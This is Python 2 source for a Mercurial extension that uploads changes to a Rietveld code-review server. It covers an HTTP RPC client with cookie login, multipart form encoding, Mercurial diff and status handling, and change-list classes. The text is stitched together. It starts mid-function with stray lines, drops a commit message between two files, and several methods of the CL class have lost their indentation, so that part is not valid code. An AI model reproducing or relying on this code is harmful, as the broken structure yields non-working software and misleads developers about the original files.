print >>sys.stderr, "The service is not available; try again later."
break
raise
self._GetAuthCookie(auth_token)
return
	def Send(self, request_path, payload=None,
			content_type="application/octet-stream",
			timeout=None,
			**kwargs):
		"""Sends an RPC and returns the response.

		Args:
			request_path: The path to send the request to, eg /api/appversion/create.
			payload: The body of the request, or None to send an empty request.
			content_type: The Content-Type header to use.
			timeout: timeout in seconds; default None i.e. no timeout.
				(Note: for large requests on OS X, the timeout doesn't work right.)
			kwargs: Any keyword arguments are converted into query string parameters.

		Returns:
			The response body, as a string.
		"""
		# TODO: Don't require authentication. Let the server say
		# whether it is necessary.
		if not self.authenticated:
			self._Authenticate()
		# setdefaulttimeout is process-wide; save/restore it so other code
		# is not affected by our per-request timeout.
		old_timeout = socket.getdefaulttimeout()
		socket.setdefaulttimeout(timeout)
		try:
			tries = 0
			while True:
				tries += 1
				args = dict(kwargs)
				url = "http://%s%s" % (self.host, request_path)
				if args:
					url += "?" + urllib.urlencode(args)
				req = self._CreateRequest(url=url, data=payload)
				req.add_header("Content-Type", content_type)
				try:
					f = self.opener.open(req)
					response = f.read()
					f.close()
					return response
				except urllib2.HTTPError, e:
					# Give up after the 4th failed attempt.
					if tries > 3:
						raise
					elif e.code == 401 or e.code == 302:
						# Auth cookie missing/expired: re-authenticate and retry.
						self._Authenticate()
					else:
						raise
		finally:
			# Always restore the process-wide socket timeout.
			socket.setdefaulttimeout(old_timeout)
class HttpRpcServer(AbstractRpcServer):
	"""Provides a simplified RPC-style interface for HTTP requests."""
	def _Authenticate(self):
		"""Save the cookie jar after authentication."""
		super(HttpRpcServer, self)._Authenticate()
		if self.save_cookies:
			StatusUpdate("Saving authentication cookies to %s" % self.cookie_file)
			self.cookie_jar.save()
	def _GetOpener(self):
		"""Returns an OpenerDirector that supports cookies and ignores redirects.

		Returns:
			A urllib2.OpenerDirector object.
		"""
		# Deliberately no HTTPRedirectHandler: redirects must surface as
		# HTTPErrors so _GetAuthCookie can detect the login 302.
		opener = urllib2.OpenerDirector()
		opener.add_handler(urllib2.ProxyHandler())
		opener.add_handler(urllib2.UnknownHandler())
		opener.add_handler(urllib2.HTTPHandler())
		opener.add_handler(urllib2.HTTPDefaultErrorHandler())
		opener.add_handler(urllib2.HTTPSHandler())
		opener.add_handler(urllib2.HTTPErrorProcessor())
		if self.save_cookies:
			# NOTE(review): uses the module-level 'server' global, not self.host,
			# so the cookie file is keyed by the configured codereview server.
			self.cookie_file = os.path.expanduser("~/.codereview_upload_cookies_" + server)
			self.cookie_jar = cookielib.MozillaCookieJar(self.cookie_file)
			if os.path.exists(self.cookie_file):
				try:
					self.cookie_jar.load()
					self.authenticated = True
					StatusUpdate("Loaded authentication cookies from %s" % self.cookie_file)
				except (cookielib.LoadError, IOError):
					# Failed to load cookies - just ignore them.
					pass
			else:
				# Create an empty cookie file with mode 600
				fd = os.open(self.cookie_file, os.O_CREAT, 0600)
				os.close(fd)
			# Always chmod the cookie file
			# NOTE(review): create-then-chmod is not atomic; there is a brief
			# window where umask-derived permissions apply.
			os.chmod(self.cookie_file, 0600)
		else:
			# Don't save cookies across runs of update.py.
			self.cookie_jar = cookielib.CookieJar()
		opener.add_handler(urllib2.HTTPCookieProcessor(self.cookie_jar))
		return opener
def GetRpcServer(options):
	"""Builds an RPC server from the command-line options.

	Returns:
		A new AbstractRpcServer, on which RPC calls can be made.
	"""
	rpc_server_class = HttpRpcServer

	def GetUserCredentials():
		"""Prompts the user for a username and password."""
		# Disable status prints so they don't obscure the password prompt.
		global global_status
		saved_status = global_status
		global_status = None
		email = options.email
		if email is None:
			email = GetEmail("Email (login for uploading to %s)" % options.server)
		password = getpass.getpass("Password for %s: " % email)
		# Put status back.
		global_status = saved_status
		return (email, password)

	# The dev_appserver accepts fake authentication via a magic cookie,
	# so skip ClientLogin entirely when talking to localhost.
	host = (options.host or options.server).lower()
	if host == "localhost" or host.startswith("localhost:"):
		email = options.email
		if email is None:
			email = "test@example.com"
			logging.info("Using debug user %s. Override with --email" % email)
		rpc = rpc_server_class(
			options.server,
			lambda: (email, "password"),
			host_override=options.host,
			extra_headers={"Cookie": 'dev_appserver_login="%s:False"' % email},
			save_cookies=options.save_cookies)
		# Don't try to talk to ClientLogin.
		rpc.authenticated = True
		return rpc

	return rpc_server_class(options.server, GetUserCredentials,
		host_override=options.host, save_cookies=options.save_cookies)
def EncodeMultipartFormData(fields, files):
	"""Encode form fields for multipart/form-data.

	Args:
		fields: A sequence of (name, value) elements for regular form fields.
		files: A sequence of (name, filename, value) elements for data to be
			uploaded as files.
	Returns:
		(content_type, body) ready for httplib.HTTP instance.
	Source:
		http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/146306
	"""
	BOUNDARY = '-M-A-G-I-C---B-O-U-N-D-A-R-Y-'
	CRLF = '\r\n'
	lines = []
	for (key, value) in fields:
		typecheck(key, str)
		typecheck(value, str)
		lines.extend([
			'--' + BOUNDARY,
			'Content-Disposition: form-data; name="%s"' % key,
			'',
			value,
		])
	for (key, filename, value) in files:
		typecheck(key, str)
		typecheck(filename, str)
		typecheck(value, str)
		lines.extend([
			'--' + BOUNDARY,
			'Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename),
			'Content-Type: %s' % GetContentType(filename),
			'',
			value,
		])
	lines.append('--' + BOUNDARY + '--')
	lines.append('')
	body = CRLF.join(lines)
	content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
	return content_type, body
def GetContentType(filename):
	"""Guess the content-type from the filename, defaulting to octet-stream."""
	ctype, _ = mimetypes.guess_type(filename)
	if not ctype:
		return 'application/octet-stream'
	return ctype
# Use a shell for subcommands on Windows to get a PATH search.
# Passed as shell= to subprocess.Popen in RunShellWithReturnCode.
use_shell = sys.platform.startswith("win")
def RunShellWithReturnCode(command, print_output=False,
		universal_newlines=True, env=os.environ):
	"""Executes a command and returns the output from stdout and the return code.

	Args:
		command: Command to execute.
		print_output: If True, the output is printed to stdout.
			If False, both stdout and stderr are ignored.
		universal_newlines: Use universal_newlines flag (default: True).

	Returns:
		Tuple (output, return code)
	"""
	logging.info("Running %s", command)
	p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
		shell=use_shell, universal_newlines=universal_newlines, env=env)
	if print_output:
		# Echo stdout line by line while also accumulating it.
		output_array = []
		while True:
			line = p.stdout.readline()
			if not line:
				break
			print line.strip("\n")
			output_array.append(line)
		output = "".join(output_array)
	else:
		output = p.stdout.read()
	p.wait()
	# NOTE(review): stdout is fully drained before stderr is read; a child
	# that fills the stderr pipe buffer first could block. Acceptable for
	# the small command outputs this script deals with.
	errout = p.stderr.read()
	if print_output and errout:
		print >>sys.stderr, errout
	p.stdout.close()
	p.stderr.close()
	return output, p.returncode
def RunShell(command, silent_ok=False, universal_newlines=True,
		print_output=False, env=os.environ):
	"""Run command via RunShellWithReturnCode; exit on failure or empty output.

	Unless silent_ok is True, an empty output is treated as an error.
	"""
	output, exit_code = RunShellWithReturnCode(command, print_output, universal_newlines, env)
	if exit_code:
		ErrorExit("Got error status from %s:\n%s" % (command, output))
	if not silent_ok and not output:
		ErrorExit("No output from %s" % command)
	return output
class VersionControlSystem(object):
	"""Abstract base class providing an interface to the VCS."""
	def __init__(self, options):
		"""Constructor.

		Args:
			options: Command line options.
		"""
		self.options = options
	def GenerateDiff(self, args):
		"""Return the current diff as a string.

		Args:
			args: Extra arguments to pass to the diff command.
		"""
		raise NotImplementedError(
			"abstract method -- subclass %s must override" % self.__class__)
	def GetUnknownFiles(self):
		"""Return a list of files unknown to the VCS."""
		raise NotImplementedError(
			"abstract method -- subclass %s must override" % self.__class__)
	def CheckForUnknownFiles(self):
		"""Show an "are you sure?" prompt if there are unknown files."""
		unknown_files = self.GetUnknownFiles()
		if unknown_files:
			print "The following files are not added to version control:"
			for line in unknown_files:
				print line
			prompt = "Are you sure to continue?(y/N) "
			answer = raw_input(prompt).strip()
			if answer != "y":
				ErrorExit("User aborted")
	def GetBaseFile(self, filename):
		"""Get the content of the upstream version of a file.

		Returns:
			A tuple (base_content, new_content, is_binary, status)
				base_content: The contents of the base file.
				new_content: For text files, this is empty.  For binary files, this is
					the contents of the new file, since the diff output won't contain
					information to reconstruct the current file.
				is_binary: True iff the file is binary.
				status: The status of the file.
		"""
		raise NotImplementedError(
			"abstract method -- subclass %s must override" % self.__class__)
	def GetBaseFiles(self, diff):
		"""Helper that calls GetBase file for each file in the patch.

		Returns:
			A dictionary that maps from filename to GetBaseFile's tuple.  Filenames
			are retrieved based on lines that start with "Index:" or
			"Property changes on:".
		"""
		files = {}
		for line in diff.splitlines(True):
			if line.startswith('Index:') or line.startswith('Property changes on:'):
				unused, filename = line.split(':', 1)
				# On Windows if a file has property changes its filename uses '\'
				# instead of '/'.
				filename = to_slash(filename.strip())
				files[filename] = self.GetBaseFile(filename)
		return files
	def UploadBaseFiles(self, issue, rpc_server, patch_list, patchset, options,
			files):
		"""Uploads the base files (and if necessary, the current ones as well)."""
		def UploadFile(filename, file_id, content, is_binary, status, is_base):
			"""Uploads a file to the server."""
			set_status("uploading " + filename)
			file_too_large = False
			# NOTE(review): 'type' shadows the builtin; left untouched here.
			if is_base:
				type = "base"
			else:
				type = "current"
			if len(content) > MAX_UPLOAD_SIZE:
				print ("Not uploading the %s file for %s because it's too large." %
					(type, filename))
				file_too_large = True
				content = ""
			# Checksum is sent even for an elided (too-large) file so the
			# server can still detect content mismatches.
			checksum = md5(content).hexdigest()
			if options.verbose > 0 and not file_too_large:
				print "Uploading %s file for %s" % (type, filename)
			url = "/%d/upload_content/%d/%d" % (int(issue), int(patchset), file_id)
			form_fields = [
				("filename", filename),
				("status", status),
				("checksum", checksum),
				("is_binary", str(is_binary)),
				("is_current", str(not is_base)),
			]
			if file_too_large:
				form_fields.append(("file_too_large", "1"))
			if options.email:
				form_fields.append(("user", options.email))
			ctype, body = EncodeMultipartFormData(form_fields, [("data", filename, content)])
			response_body = rpc_server.Send(url, body, content_type=ctype)
			if not response_body.startswith("OK"):
				StatusUpdate(" --> %s" % response_body)
				sys.exit(1)
		# Don't want to spawn too many threads, nor do we want to
		# hit Rietveld too hard, or it will start serving 500 errors.
		# When 8 works, it's no better than 4, and sometimes 8 is
		# too many for Rietveld to handle.
		MAX_PARALLEL_UPLOADS = 4
		sema = threading.BoundedSemaphore(MAX_PARALLEL_UPLOADS)
		upload_threads = []
		finished_upload_threads = []
		class UploadFileThread(threading.Thread):
			# Worker thread: uploads one file, then signals completion by
			# appending itself to finished_upload_threads and releasing sema.
			def __init__(self, args):
				threading.Thread.__init__(self)
				self.args = args
			def run(self):
				UploadFile(*self.args)
				finished_upload_threads.append(self)
				sema.release()
		def StartUploadFile(*args):
			# Block until an upload slot is free, reap finished threads,
			# then launch a new worker for this file.
			sema.acquire()
			while len(finished_upload_threads) > 0:
				t = finished_upload_threads.pop()
				upload_threads.remove(t)
				t.join()
			t = UploadFileThread(args)
			upload_threads.append(t)
			t.start()
		def WaitForUploads():
			for t in upload_threads:
				t.join()
		# patch_list holds (patch id, filename) pairs; invert to a
		# filename -> patch id map (first occurrence wins via setdefault).
		patches = dict()
		[patches.setdefault(v, k) for k, v in patch_list]
		for filename in patches.keys():
			base_content, new_content, is_binary, status = files[filename]
			file_id_str = patches.get(filename)
			# A "nobase" marker in the id means the base file is not uploaded.
			if file_id_str.find("nobase") != -1:
				base_content = None
				file_id_str = file_id_str[file_id_str.rfind("_") + 1:]
			file_id = int(file_id_str)
			if base_content != None:
				StartUploadFile(filename, file_id, base_content, is_binary, status, True)
			if new_content != None:
				StartUploadFile(filename, file_id, new_content, is_binary, status, False)
		WaitForUploads()
	def IsImage(self, filename):
		"""Returns true if the filename has an image extension."""
		mimetype = mimetypes.guess_type(filename)[0]
		if not mimetype:
			return False
		return mimetype.startswith("image/")
	def IsBinary(self, filename):
		"""Returns true if the guessed mimetype isn't in the text group."""
		mimetype = mimetypes.guess_type(filename)[0]
		if not mimetype:
			return False  # e.g. README, "real" binaries usually have an extension
		# special case for text files which don't start with text/
		if mimetype in TEXT_MIMETYPES:
			return False
		return not mimetype.startswith("text/")
class FakeMercurialUI(object):
	"""Stand-in for Mercurial's ui object that captures command output.

	Text hg commands would print is accumulated in self.output instead;
	config/path queries are delegated to the real global_ui.
	"""
	def __init__(self):
		self.quiet = True  # suppress hg chatter
		self.output = ''   # accumulated text written via write()
	def write(self, *args, **opts):
		# Capture output instead of printing it.
		self.output += ' '.join(args)
	def copy(self):
		# hg copies the ui object; returning self keeps output in one place.
		return self
	def status(self, *args, **opts):
		# Discard status messages.
		pass
	def readconfig(self, *args, **opts):
		# Config is delegated to global_ui; nothing to read here.
		pass
	def expandpath(self, *args, **opts):
		return global_ui.expandpath(*args, **opts)
	def configitems(self, *args, **opts):
		return global_ui.configitems(*args, **opts)
	def config(self, *args, **opts):
		return global_ui.config(*args, **opts)
# When True, MercurialVCS shells out to the hg binary for status/cat instead
# of calling Mercurial's Python API in-process.
use_hg_shell = False # set to True to shell out to hg always; slower
class MercurialVCS(VersionControlSystem):
	"""Implementation of the VersionControlSystem interface for Mercurial."""
	def __init__(self, options, ui, repo):
		super(MercurialVCS, self).__init__(options)
		self.ui = ui
		self.repo = repo
		self.status = None  # cached 'hg status -C' lines; see get_hg_status
		# Absolute path to repository (we can be in a subdir)
		self.repo_dir = os.path.normpath(repo.root)
		# Compute the subdir
		cwd = os.path.normpath(os.getcwd())
		assert cwd.startswith(self.repo_dir)
		self.subdir = cwd[len(self.repo_dir):].lstrip(r"\/")
		if self.options.revision:
			self.base_rev = self.options.revision
		else:
			# Prefer the parent of the MQ patch queue as the base revision,
			# falling back to the working directory's parent.
			mqparent, err = RunShellWithReturnCode(['hg', 'log', '--rev', 'qparent', '--template={node}'])
			if not err and mqparent != "":
				self.base_rev = mqparent
			else:
				self.base_rev = RunShell(["hg", "parents", "-q"]).split(':')[1].strip()
	def _GetRelPath(self, filename):
		"""Get relative path of a file according to the current directory,
		given its logical path in the repo."""
		assert filename.startswith(self.subdir), (filename, self.subdir)
		return filename[len(self.subdir):].lstrip(r"\/")
	def GenerateDiff(self, extra_args):
		# If no file specified, restrict to the current subdir
		extra_args = extra_args or ["."]
		cmd = ["hg", "diff", "--git", "-r", self.base_rev] + extra_args
		data = RunShell(cmd, silent_ok=True)
		svndiff = []
		filecount = 0
		for line in data.splitlines():
			m = re.match("diff --git a/(\S+) b/(\S+)", line)
			if m:
				# Modify line to make it look like as it comes from svn diff.
				# With this modification no changes on the server side are required
				# to make upload.py work with Mercurial repos.
				# NOTE: for proper handling of moved/copied files, we have to use
				# the second filename.
				filename = m.group(2)
				svndiff.append("Index: %s" % filename)
				svndiff.append("=" * 67)
				filecount += 1
				logging.info(line)
			else:
				svndiff.append(line)
		if not filecount:
			ErrorExit("No valid patches found in output from hg diff")
		return "\n".join(svndiff) + "\n"
	def GetUnknownFiles(self):
		"""Return a list of files unknown to the VCS."""
		# NOTE(review): 'args' is unused; left untouched in this doc pass.
		args = []
		status = RunShell(["hg", "status", "--rev", self.base_rev, "-u", "."],
			silent_ok=True)
		unknown_files = []
		for line in status.splitlines():
			# Each line is "<status> <filename>"; "?" marks untracked files.
			st, fn = line.split(" ", 1)
			if st == "?":
				unknown_files.append(fn)
		return unknown_files
	def get_hg_status(self, rev, path):
		# We'd like to use 'hg status -C path', but that is buggy
		# (see http://mercurial.selenic.com/bts/issue3023).
		# Instead, run 'hg status -C' without a path
		# and skim the output for the path we want.
		if self.status is None:
			if use_hg_shell:
				out = RunShell(["hg", "status", "-C", "--rev", rev])
			else:
				# Drive Mercurial in-process, capturing output via FakeMercurialUI.
				fui = FakeMercurialUI()
				ret = hg_commands.status(fui, self.repo, *[], **{'rev': [rev], 'copies': True})
				if ret:
					raise hg_util.Abort(ret)
				out = fui.output
			self.status = out.splitlines()
		for i in range(len(self.status)):
			# line is
			#	A path
			#	M path
			# etc
			line = to_slash(self.status[i])
			if line[2:] == path:
				# A copy source follows on the next line, indented two spaces.
				if i+1 < len(self.status) and self.status[i+1][:2] == '  ':
					return self.status[i:i+2]
				return self.status[i:i+1]
		raise hg_util.Abort("no status for " + path)
	def GetBaseFile(self, filename):
		set_status("inspecting " + filename)
		# "hg status" and "hg cat" both take a path relative to the current subdir
		# rather than to the repo root, but "hg diff" has given us the full path
		# to the repo root.
		base_content = ""
		new_content = None
		is_binary = False
		oldrelpath = relpath = self._GetRelPath(filename)
		out = self.get_hg_status(self.base_rev, relpath)
		status, what = out[0].split(' ', 1)
		# An "A" with a copy source means the file was copied/renamed:
		# treat it as modified relative to the source path.
		if len(out) > 1 and status == "A" and what == relpath:
			oldrelpath = out[1].strip()
			status = "M"
		if ":" in self.base_rev:
			base_rev = self.base_rev.split(":", 1)[0]
		else:
			base_rev = self.base_rev
		if status != "A":
			if use_hg_shell:
				base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath], silent_ok=True)
			else:
				base_content = str(self.repo[base_rev][oldrelpath].data())
			is_binary = "\0" in base_content  # Mercurial's heuristic
		if status != "R":
			new_content = open(relpath, "rb").read()
			is_binary = is_binary or "\0" in new_content
		if is_binary and base_content and use_hg_shell:
			# Fetch again without converting newlines
			base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath],
				silent_ok=True, universal_newlines=False)
		# Only binary images need new_content uploaded; the diff suffices
		# for text files.
		if not is_binary or not self.IsImage(relpath):
			new_content = None
		return base_content, new_content, is_binary, status
# NOTE: The SplitPatch function is duplicated in engine.py, keep them in sync.
def SplitPatch(data):
	"""Splits a patch into separate pieces for each file.

	Args:
		data: A string containing the output of svn diff.

	Returns:
		A list of 2-tuple (filename, text) where text is the svn diff output
		pertaining to filename.
	"""
	result = []
	current_name = None
	current_lines = []
	for line in data.splitlines(True):
		next_name = None
		if line.startswith('Index:'):
			_, next_name = line.split(':', 1)
			next_name = next_name.strip()
		elif line.startswith('Property changes on:'):
			_, prop_name = line.split(':', 1)
			# When a file is modified, paths use '/' between directories, however
			# when a property is modified '\' is used on Windows. Make them the same
			# otherwise the file shows up twice.
			prop_name = to_slash(prop_name.strip())
			if prop_name != current_name:
				# File has property changes but no modifications; start a new diff.
				next_name = prop_name
		if next_name:
			if current_name and current_lines:
				result.append((current_name, ''.join(current_lines)))
			current_name = next_name
			current_lines = [line]
			continue
		current_lines.append(line)
	if current_name and current_lines:
		result.append((current_name, ''.join(current_lines)))
	return result
def UploadSeparatePatches(issue, rpc_server, patchset, data, options):
	"""Uploads a separate patch for each file in the diff output.

	Returns a list of [patch_key, filename] for each file.
	"""
	rv = []
	for filename, text in SplitPatch(data):
		set_status("uploading patch for " + filename)
		if len(text) > MAX_UPLOAD_SIZE:
			print("Not uploading the patch for " + filename + " because the file is too large.")
			continue
		form_fields = [("filename", filename)]
		if not options.download_base:
			form_fields.append(("content_upload", "1"))
		files = [("data", "data.diff", text)]
		ctype, body = EncodeMultipartFormData(form_fields, files)
		url = "/%d/upload_patch/%d" % (int(issue), int(patchset))
		print("Uploading patch for " + filename)
		response_body = rpc_server.Send(url, body, content_type=ctype)
		lines = response_body.splitlines()
		if not lines or lines[0] != "OK":
			StatusUpdate(" --> %s" % response_body)
			sys.exit(1)
		rv.append([lines[1], filename])
	return rv
codereview: Initialize "found" in codereview.py.
Fixes issue 2569 (hg undo crashes when CL not found).
R=golang-dev, rsc
CC=golang-dev
http://codereview.appspot.com/5489052
Committer: Russ Cox <5ad239cb8a44f659eaaee0aa1ea5b94947abe557@golang.org>
# coding=utf-8
# (The line above is necessary so that I can use 世界 in the
# *comment* below without Python getting all bent out of shape.)
# Copyright 2007-2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Mercurial interface to codereview.appspot.com.
To configure, set the following options in
your repository's .hg/hgrc file.
[extensions]
codereview = /path/to/codereview.py
[codereview]
server = codereview.appspot.com
The server should be running Rietveld; see http://code.google.com/p/rietveld/.
In addition to the new commands, this extension introduces
the file pattern syntax @nnnnnn, where nnnnnn is a change list
number, to mean the files included in that change list, which
must be associated with the current client.
For example, if change 123456 contains the files x.go and y.go,
"hg diff @123456" is equivalent to "hg diff x.go y.go".
'''
import sys
# Refuse to run standalone: this file only works as a Mercurial extension.
if __name__ == "__main__":
	print >>sys.stderr, "This is a Mercurial extension and should not be invoked directly."
	sys.exit(2)
# We require Python 2.6 for the json package.
# NOTE(review): comparing sys.version as a string works for historical 2.x
# releases but would misorder a hypothetical "2.10".
if sys.version < '2.6':
	print >>sys.stderr, "The codereview extension requires Python 2.6 or newer."
	print >>sys.stderr, "You are running Python " + sys.version
	sys.exit(2)
import json
import os
import re
import stat
import subprocess
import threading
import time
from mercurial import commands as hg_commands
from mercurial import util as hg_util
# Module-level state; 'server' defaults to the public Rietveld instance and
# the rest are presumably filled in from hgrc/configuration elsewhere in the
# extension (not visible in this chunk) — confirm against the full file.
defaultcc = None
codereview_disabled = None
real_rollback = None
releaseBranch = None
server = "codereview.appspot.com"
server_url_base = None
#######################################################################
# Normally I would split this into multiple files, but it simplifies
# import path headaches to keep it all in one file. Sorry.
# The different parts of the file are separated by banners like this one.
#######################################################################
# Helpers
def RelativePath(path, cwd):
	"""Return path relative to cwd if path lies strictly inside cwd.

	Paths are '/'-separated strings; cwd must not end in '/'. A path that
	merely shares a prefix (e.g. "/a/bc" vs cwd "/a/b") is returned unchanged.
	"""
	n = len(cwd)
	# Bounds-check before indexing: the original code raised IndexError when
	# path == cwd because path[n] was past the end of the string.
	if path.startswith(cwd) and n < len(path) and path[n] == '/':
		return path[n+1:]
	return path
def Sub(l1, l2):
	"""Return the elements of l1 not present in l2, preserving l1's order."""
	result = []
	for item in l1:
		if item not in l2:
			result.append(item)
	return result
def Add(l1, l2):
	"""Return the sorted union of l1 and l2 (duplicates from l2 dropped)."""
	merged = l1 + [item for item in l2 if item not in l1]
	merged.sort()
	return merged
def Intersect(l1, l2):
	"""Return the elements of l1 that also appear in l2, in l1's order."""
	result = []
	for item in l1:
		if item in l2:
			result.append(item)
	return result
#######################################################################
# RE: UNICODE STRING HANDLING
#
# Python distinguishes between the str (string of bytes)
# and unicode (string of code points) types. Most operations
# work on either one just fine, but some (like regexp matching)
# require unicode, and others (like write) require str.
#
# As befits the language, Python hides the distinction between
# unicode and str by converting between them silently, but
# *only* if all the bytes/code points involved are 7-bit ASCII.
# This means that if you're not careful, your program works
# fine on "hello, world" and fails on "hello, 世界". And of course,
# the obvious way to be careful - use static types - is unavailable.
# So the only way is trial and error to find where to put explicit
# conversions.
#
# Because more functions do implicit conversion to str (string of bytes)
# than do implicit conversion to unicode (string of code points),
# the convention in this module is to represent all text as str,
# converting to unicode only when calling a unicode-only function
# and then converting back to str as soon as possible.
def typecheck(s, t):
	"""Abort (via hg_util.Abort) unless s has exactly type t."""
	if type(s) == t:
		return
	raise hg_util.Abort("type check failed: %s has type %s != %s" % (repr(s), type(s), t))
# If we have to pass unicode instead of str, ustr does that conversion clearly.
def ustr(s):
	# Only byte strings may be converted; anything else aborts via typecheck.
	typecheck(s, str)
	return s.decode("utf-8")
# Even with those, Mercurial still sometimes turns unicode into str
# and then tries to use it as ascii. Change Mercurial's default.
def set_mercurial_encoding_to_utf8():
	# Force Mercurial's global encoding to UTF-8 instead of the locale default.
	from mercurial import encoding
	encoding.encoding = 'utf-8'

set_mercurial_encoding_to_utf8()
# Even with those we still run into problems.
# I tried to do things by the book but could not convince
# Mercurial to let me check in a change with UTF-8 in the
# CL description or author field, no matter how many conversions
# between str and unicode I inserted and despite changing the
# default encoding. I'm tired of this game, so set the default
# encoding for all of Python to 'utf-8', not 'ascii'.
def default_to_utf8():
	import sys
	# reload(sys) resets sys.stdout/__stdout__; save and restore them so
	# any wrapping done earlier (e.g. by Mercurial) is preserved.
	stdout, __stdout__ = sys.stdout, sys.__stdout__
	reload(sys) # site.py deleted setdefaultencoding; get it back
	sys.stdout, sys.__stdout__ = stdout, __stdout__
	sys.setdefaultencoding('utf-8')

default_to_utf8()
#######################################################################
# Status printer for long-running commands
# Most recent status message; printed periodically by StatusThread.
# None suppresses printing entirely.
global_status = None

def set_status(s):
	# Record the current long-running-operation status for StatusThread.
	# print >>sys.stderr, "\t", time.asctime(), s
	global global_status
	global_status = s
class StatusThread(threading.Thread):
	"""Daemon thread that periodically echoes global_status to stderr.

	Intended for long-running commands; quick commands finish before the
	initial delay and never print anything.
	"""
	def __init__(self):
		threading.Thread.__init__(self)
	def run(self):
		# pause a reasonable amount of time before
		# starting to display status messages, so that
		# most hg commands won't ever see them.
		time.sleep(30)
		# now show status every 15 seconds
		while True:
			# Sleep until the next 15-second boundary.
			time.sleep(15 - time.time() % 15)
			s = global_status
			if s is None:
				continue
			if s == "":
				s = "(unknown status)"
			print >>sys.stderr, time.asctime(), s
def start_status_thread():
	"""Launch the background StatusThread that reports global_status."""
	thread = StatusThread()
	thread.setDaemon(True)  # allowed to exit if t is still running
	thread.start()
#######################################################################
# Change list parsing.
#
# Change lists are stored in .hg/codereview/cl.nnnnnn
# where nnnnnn is the number assigned by the code review server.
# Most data about a change list is stored on the code review server
# too: the description, reviewer, and cc list are all stored there.
# The only thing in the cl.nnnnnn file is the list of relevant files.
# Also, the existence of the cl.nnnnnn file marks this repository
# as the one where the change list lives.
# Placeholder diff uploaded when a CL has no real file diffs
# (see the uploaded_diff_file fallback in CL.Upload).
emptydiff = """Index: ~rietveld~placeholder~
===================================================================
diff --git a/~rietveld~placeholder~ b/~rietveld~placeholder~
new file mode 100644
"""
class CL(object):
	def __init__(self, name):
		typecheck(name, str)
		self.name = name         # CL number as a string, or "new" before upload
		self.desc = ''           # change description text
		self.files = []          # file names included in the CL
		self.reviewer = []       # reviewer addresses (joined with JoinComma)
		self.cc = []             # CC addresses
		self.url = ''            # issue URL; '' until known — shown in EditorText
		self.local = False       # presumably: CL metadata stored in this client — confirm
		self.web = False         # when True, Flush syncs the CL to the server
		self.copied_from = None  # None means current user
		self.mailed = False      # whether review mail has been sent (see DiskText)
		self.private = False     # whether the issue is marked private
		self.lgtm = []           # (who, line) pairs shown by PendingText
def DiskText(self):
cl = self
s = ""
if cl.copied_from:
s += "Author: " + cl.copied_from + "\n\n"
if cl.private:
s += "Private: " + str(self.private) + "\n"
s += "Mailed: " + str(self.mailed) + "\n"
s += "Description:\n"
s += Indent(cl.desc, "\t")
s += "Files:\n"
for f in cl.files:
s += "\t" + f + "\n"
typecheck(s, str)
return s
def EditorText(self):
cl = self
s = _change_prolog
s += "\n"
if cl.copied_from:
s += "Author: " + cl.copied_from + "\n"
if cl.url != '':
s += 'URL: ' + cl.url + ' # cannot edit\n\n'
if cl.private:
s += "Private: True\n"
s += "Reviewer: " + JoinComma(cl.reviewer) + "\n"
s += "CC: " + JoinComma(cl.cc) + "\n"
s += "\n"
s += "Description:\n"
if cl.desc == '':
s += "\t<enter description here>\n"
else:
s += Indent(cl.desc, "\t")
s += "\n"
if cl.local or cl.name == "new":
s += "Files:\n"
for f in cl.files:
s += "\t" + f + "\n"
s += "\n"
typecheck(s, str)
return s
def PendingText(self, quick=False):
cl = self
s = cl.name + ":" + "\n"
s += Indent(cl.desc, "\t")
s += "\n"
if cl.copied_from:
s += "\tAuthor: " + cl.copied_from + "\n"
if not quick:
s += "\tReviewer: " + JoinComma(cl.reviewer) + "\n"
for (who, line) in cl.lgtm:
s += "\t\t" + who + ": " + line + "\n"
s += "\tCC: " + JoinComma(cl.cc) + "\n"
s += "\tFiles:\n"
for f in cl.files:
s += "\t\t" + f + "\n"
typecheck(s, str)
return s
	def Flush(self, ui, repo):
		# A CL named "new" has not been created on the server yet; upload it
		# first so it gets a real issue number before being written to disk.
		if self.name == "new":
			self.Upload(ui, repo, gofmt_just_warn=True, creating=True)
		dir = CodeReviewDir(ui, repo)
		path = dir + '/cl.' + self.name
		# Write to path+'!' and rename into place so readers never see a
		# partially written file.
		f = open(path+'!', "w")
		f.write(self.DiskText())
		f.close()
		# Windows cannot rename over an existing file; remove the target first.
		if sys.platform == "win32" and os.path.isfile(path):
			os.remove(path)
		os.rename(path+'!', path)
		# Mirror the metadata to the code review server, unless the CL was
		# copied from another user (their server copy is authoritative).
		if self.web and not self.copied_from:
			EditDesc(self.name, desc=self.desc,
				reviewers=JoinComma(self.reviewer), cc=JoinComma(self.cc),
				private=self.private)
def Delete(self, ui, repo):
dir = CodeReviewDir(ui, repo)
os.unlink(dir + "/cl." + self.name)
def Subject(self):
s = line1(self.desc)
if len(s) > 60:
s = s[0:55] + "..."
if self.name != "new":
s = "code review %s: %s" % (self.name, s)
typecheck(s, str)
return s
def Upload(self, ui, repo, send_mail=False, gofmt=True, gofmt_just_warn=False, creating=False, quiet=False):
    # Create or update the Rietveld issue for this CL: post metadata and
    # the diff, then (if needed) upload oversized patches and base files
    # separately, optionally trigger review mail, and flush to disk.
    if not self.files and not creating:
        ui.warn("no files in change list\n")
    if ui.configbool("codereview", "force_gofmt", True) and gofmt:
        CheckFormat(ui, repo, self.files, just_warn=gofmt_just_warn)
    set_status("uploading CL metadata + diffs")
    os.chdir(repo.root)
    form_fields = [
        ("content_upload", "1"),
        ("reviewers", JoinComma(self.reviewer)),
        ("cc", JoinComma(self.cc)),
        ("description", self.desc),
        ("base_hashes", ""),
    ]
    if self.name != "new":
        form_fields.append(("issue", self.name))
    vcs = None
    # We do not include files when creating the issue,
    # because we want the patch sets to record the repository
    # and base revision they are diffs against. We use the patch
